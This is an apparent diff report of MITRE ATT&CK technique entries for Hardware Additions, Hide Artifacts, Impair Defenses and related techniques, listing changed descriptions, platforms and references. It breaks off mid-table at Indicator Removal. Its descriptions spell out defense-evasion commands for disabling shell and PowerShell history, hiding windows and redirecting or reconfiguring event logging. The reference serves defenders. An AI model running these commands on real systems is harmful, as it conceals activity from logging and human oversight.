While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012)
Description (new, v1.7):
Adversaries may physically introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access points to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012)
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:40.332000+00:00 | 2025-04-15 19:59:11.434000+00:00 |
description | Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012) | Adversaries may physically introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access points to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012) |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.6 | 1.7 |
[T1564.005] Hide Artifacts: Hidden File System
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-29 15:12:11.024000+00:00 | 2025-04-15 19:59:14.404000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1564.001] Hide Artifacts: Hidden Files and Directories
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Host forensic analysis'] | |
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-29 22:32:25.985000+00:00 | 2025-04-15 19:59:19.293000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1564.003] Hide Artifacts: Hidden Window
Current version: 1.3
Version changed from: 1.2 → 1.3
Description (old, v1.2):
Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.
Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)
On macOS, the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.
Similarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>.(Citation: PowerShell About 2019)
In addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding <code>explorer.exe</code> process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack) All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops windows.
Description (new, v1.3):
Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.
Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)
On macOS, the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.
Similarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>.(Citation: PowerShell About 2019)
The Windows Registry can also be edited to hide application windows from the current user. For example, by setting the `WindowPosition` subkey in the `HKEY_CURRENT_USER\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_PowerShell.exe` Registry key to a maximum value, PowerShell windows will open off screen and be hidden.(Citation: Cantoris Computing)
In addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding <code>explorer.exe</code> process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack) All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops windows.
New Detections:
- DS0024: Windows Registry (Windows Registry Key Modification)
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-13 14:28:20.651000+00:00 | 2025-04-15 19:59:07.977000+00:00 |
description | Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.
Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)
On macOS, the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement , which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.
Similarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden .(Citation: PowerShell About 2019)
In addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding explorer.exe process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack) All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops windows. | Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.
Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)
On macOS, the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement , which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.
Similarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden .(Citation: PowerShell About 2019)
The Windows Registry can also be edited to hide application windows from the current user. For example, by setting the `WindowPosition` subkey in the `HKEY_CURRENT_USER\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_PowerShell.exe` Registry key to a maximum value, PowerShell windows will open off screen and be hidden.(Citation: Cantoris Computing)
In addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding explorer.exe process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack) All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops windows. |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Cantoris Computing', 'description': 'Cantoris. (2016, July 22). PowerShell Malware. Retrieved December 12, 2024.', 'url': 'https://cantoriscomputing.wordpress.com/2016/07/22/powershell-malware/'} |
x_mitre_contributors | | Vijay Lalwani |
x_mitre_data_sources | | Windows Registry: Windows Registry Key Modification |
[T1564] Hide Artifacts
Current version: 1.4
Version changed from: 1.3 → 1.4
New Mitigations:
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:58:49.815000+00:00 | 2025-04-15 21:39:52.216000+00:00 |
x_mitre_version | 1.3 | 1.4 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1665] Hide Infrastructure
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-18 19:44:00.603000+00:00 | 2025-04-15 19:59:18.948000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Network Devices |
x_mitre_platforms | | ESXi |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Network | |
[T1574] Hijack Execution Flow
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Application Control'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-11-21 20:02:33.404000+00:00 | 2025-04-15 19:58:57.767000+00:00 |
x_mitre_version | 1.2 | 1.3 |
[T1505.004] Server Software Component: IIS Components
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-17 15:06:24.161000+00:00 | 2025-04-15 19:58:59.560000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1546.012] Event Triggered Execution: Image File Execution Options Injection
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-11-10 18:29:31.112000+00:00 | 2025-04-15 19:58:39.823000+00:00 |
external_references[5]['description'] | Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 12, 2014. | Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 17, 2024. |
external_references[5]['url'] | http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ | https://web.archive.org/web/20200730053039/https://www.crowdstrike.com/blog/registry-analysis-with-crowdresponse/ |
x_mitre_version | 1.1 | 1.2 |
[T1562.003] Impair Defenses: Impair Command History Logging
Current version: 2.3
Version changed from: 2.2 → 2.3
Description (old, v2.2):
Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The <code>HISTCONTROL</code> environment variable keeps track of what should be saved by the <code>history</code> command and eventually into the <code>~/.bash_history</code> file when a user logs out. <code>HISTCONTROL</code> does not exist by default on macOS, but can be set by the user and will be respected.
Adversaries may clear the history environment variable (<code>unset HISTFILE</code>) or set the command history size to zero (<code>export HISTFILESIZE=0</code>) to prevent logging of commands. Additionally, <code>HISTCONTROL</code> can be configured to ignore commands that start with a space by simply setting it to "ignorespace". <code>HISTCONTROL</code> can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
On Windows systems, the <code>PSReadLine</code> module tracks commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code> by default). Adversaries may change where these logs are saved using <code>Set-PSReadLineOption -HistorySavePath {File Path}</code>. This will cause <code>ConsoleHost_history.txt</code> to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command <code>Set-PSReadlineOption -HistorySaveStyle SaveNothing</code>.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. <code>no logging</code>).
Description (new, v2.3):
Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The <code>HISTCONTROL</code> environment variable keeps track of what should be saved by the <code>history</code> command and eventually into the <code>~/.bash_history</code> file when a user logs out. <code>HISTCONTROL</code> does not exist by default on macOS, but can be set by the user and will be respected. The `HISTFILE` environment variable is also used in some ESXi systems.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)
Adversaries may clear the history environment variable (<code>unset HISTFILE</code>) or set the command history size to zero (<code>export HISTFILESIZE=0</code>) to prevent logging of commands. Additionally, <code>HISTCONTROL</code> can be configured to ignore commands that start with a space by simply setting it to "ignorespace". <code>HISTCONTROL</code> can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
On Windows systems, the <code>PSReadLine</code> module tracks commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code> by default). Adversaries may change where these logs are saved using <code>Set-PSReadLineOption -HistorySavePath {File Path}</code>. This will cause <code>ConsoleHost_history.txt</code> to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command <code>Set-PSReadlineOption -HistorySaveStyle SaveNothing</code>.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. <code>no logging</code>).
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Host forensic analysis', 'Log analysis'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:47.940000+00:00 | 2025-04-15 19:58:50.696000+00:00 |
description | Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE . When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history . The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.
Adversaries may clear the history environment variable (unset HISTFILE ) or set the command history size to zero (export HISTFILESIZE=0 ) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
On Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path} . This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing .(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. no logging ). | Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE . When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history . The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. The `HISTFILE` environment variable is also used in some ESXi systems.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)
Adversaries may clear the history environment variable (unset HISTFILE ) or set the command history size to zero (export HISTFILESIZE=0 ) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
On Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path} . This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing .(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. no logging ). |
external_references[3]['description'] | Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020. | Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved November 17, 2024. |
external_references[3]['url'] | https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics | https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 2.2 | 2.3 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Google Cloud Threat Intelligence ESXi VIBs 2022', 'description': 'Alexander Marvi, Jeremy Koppen, Tufail Ahmed, and Jonathan Lepore. (2022, September 29). Bad VIB(E)s Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors. Retrieved March 26, 2025.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/esxi-hypervisors-malware-persistence'} |
x_mitre_platforms | | ESXi |
[T1562] Impair Defenses
Current version: 1.7
Version changed from: 1.6 → 1.7
New Mitigations:
- M1042: Disable or Remove Feature or Program
New Detections:
- DS0009: Process (Process Metadata)
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Signature-based detection', 'Host intrusion prevention systems', 'File monitoring', 'Digital Certificate Validation', 'Host forensic analysis', 'Log analysis', 'Firewall'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:24.596000+00:00 |
x_mitre_version | 1.6 | 1.7 |
x_mitre_platforms[5] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_data_sources | | Process: Process Metadata |
x_mitre_platforms | | ESXi |
[T1525] Implant Internal Image
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-08 21:27:49.094000+00:00 | 2025-04-15 19:58:29.793000+00:00 |
x_mitre_version | 2.1 | 2.2 |
[T1562.006] Impair Defenses: Indicator Blocking
Current version: 1.5
Version changed from: 1.4 → 1.5
|
|
t | An adversary may attempt to block indicators or events typic | t | An adversary may attempt to block indicators or events typic |
| ally captured by sensors from being gathered and analyzed. T | | ally captured by sensors from being gathered and analyzed. T |
| his could include maliciously redirecting(Citation: Microsof | | his could include maliciously redirecting(Citation: Microsof |
| t Lamin Sept 2017) or even disabling host-based sensors, suc | | t Lamin Sept 2017) or even disabling host-based sensors, suc |
| h as Event Tracing for Windows (ETW)(Citation: Microsoft Abo | | h as Event Tracing for Windows (ETW)(Citation: Microsoft Abo |
| ut Event Tracing 2018), by tampering settings that control t | | ut Event Tracing 2018), by tampering settings that control t |
| he collection and flow of event telemetry.(Citation: Medium | | he collection and flow of event telemetry.(Citation: Medium |
| Event Tracing Tampering 2018) These settings may be stored o | | Event Tracing Tampering 2018) These settings may be stored o |
| n the system in configuration files and/or in the Registry a | | n the system in configuration files and/or in the Registry a |
| s well as being accessible via administrative utilities such | | s well as being accessible via administrative utilities such |
| as [PowerShell](https://attack.mitre.org/techniques/T1059/0 | | as [PowerShell](https://attack.mitre.org/techniques/T1059/0 |
| 01) or [Windows Management Instrumentation](https://attack.m | | 01) or [Windows Management Instrumentation](https://attack.m |
| itre.org/techniques/T1047). For example, adversaries may mo | | itre.org/techniques/T1047). For example, adversaries may mo |
| dify the `File` value in <code>HKEY_LOCAL_MACHINE\SYSTEM\Cur | | dify the `File` value in <code>HKEY_LOCAL_MACHINE\SYSTEM\Cur |
| rentControlSet\Services\EventLog\Security</code> to hide the | | rentControlSet\Services\EventLog\Security</code> to hide the |
| ir malicious actions in a new or different .evtx log file. T | | ir malicious actions in a new or different .evtx log file. T |
| his action does not require a system reboot and takes effect | | his action does not require a system reboot and takes effect |
| immediately.(Citation: disable_win_evt_logging) ETW inter | | immediately.(Citation: disable_win_evt_logging) ETW inter |
| ruption can be achieved multiple ways, however most directly | | ruption can be achieved multiple ways, however most directly |
| by defining conditions using the [PowerShell](https://attac | | by defining conditions using the [PowerShell](https://attac |
| k.mitre.org/techniques/T1059/001) <code>Set-EtwTraceProvider | | k.mitre.org/techniques/T1059/001) <code>Set-EtwTraceProvider |
| </code> cmdlet or by interfacing directly with the Registry | | </code> cmdlet or by interfacing directly with the Registry |
| to make alterations. In the case of network-based reporting | | to make alterations. In the case of network-based reporting |
| of indicators, an adversary may block traffic associated wi | | of indicators, an adversary may block traffic associated wi |
| th reporting to prevent central analysis. This may be accomp | | th reporting to prevent central analysis. This may be accomp |
| lished by many means, such as stopping a local process respo | | lished by many means, such as stopping a local process respo |
| nsible for forwarding telemetry and/or creating a host-based | | nsible for forwarding telemetry and/or creating a host-based |
| firewall rule to block traffic to specific hosts responsibl | | firewall rule to block traffic to specific hosts responsibl |
| e for aggregating events, such as security information and e | | e for aggregating events, such as security information and e |
| vent management (SIEM) products. In Linux environments, adv | | vent management (SIEM) products. In Linux environments, adv |
| ersaries may disable or reconfigure log processing tools suc | | ersaries may disable or reconfigure log processing tools suc |
| h as syslog or nxlog to inhibit detection and monitoring cap | | h as syslog or nxlog to inhibit detection and monitoring cap |
| abilities to facilitate follow on behaviors (Citation: Lemon | | abilities to facilitate follow on behaviors. (Citation: Lemo |
| Duck). | | nDuck) ESXi also leverages syslog, which can be reconfigured |
| | | via commands such as `esxcli system syslog config set` and |
| | | `esxcli system syslog config reload`.(Citation: Google Cloud |
| | | Threat Intelligence ESXi VIBs 2022)(Citation: Broadcom Conf |
| | | iguring syslog on ESXi) |
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Host intrusion prevention systems'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-02-14 21:50:32.531000+00:00 | 2025-04-16 21:29:20.899000+00:00 |
description | An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
For example, adversaries may modify the `File` value in `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security` to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging)
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) `Set-EtwTraceProvider` cmdlet or by interfacing directly with the Registry to make alterations.
In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.
In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck). | An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
For example, adversaries may modify the `File` value in `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security` to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging)
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) `Set-EtwTraceProvider` cmdlet or by interfacing directly with the Registry to make alterations.
In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.
In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors. (Citation: LemonDuck) ESXi also leverages syslog, which can be reconfigured via commands such as `esxcli system syslog config set` and `esxcli system syslog config reload`.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)(Citation: Broadcom Configuring syslog on ESXi) |
x_mitre_version | 1.4 | 1.5 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Google Cloud Threat Intelligence ESXi VIBs 2022', 'description': 'Alexander Marvi, Jeremy Koppen, Tufail Ahmed, and Jonathan Lepore. (2022, September 29). Bad VIB(E)s Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors. Retrieved March 26, 2025.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/esxi-hypervisors-malware-persistence'} |
external_references | | {'source_name': 'Broadcom Configuring syslog on ESXi', 'description': 'Broadcom. (n.d.). Configuring syslog on ESXi. Retrieved March 27, 2025.', 'url': 'https://knowledge.broadcom.com/external/article/318939/configuring-syslog-on-esxi.html'} |
x_mitre_platforms | | ESXi |
[T1070] Indicator Removal
Current version: 2.3
Version changed from: 2.2 → 2.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Log analysis', 'Host intrusion prevention systems', 'Anti-virus'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
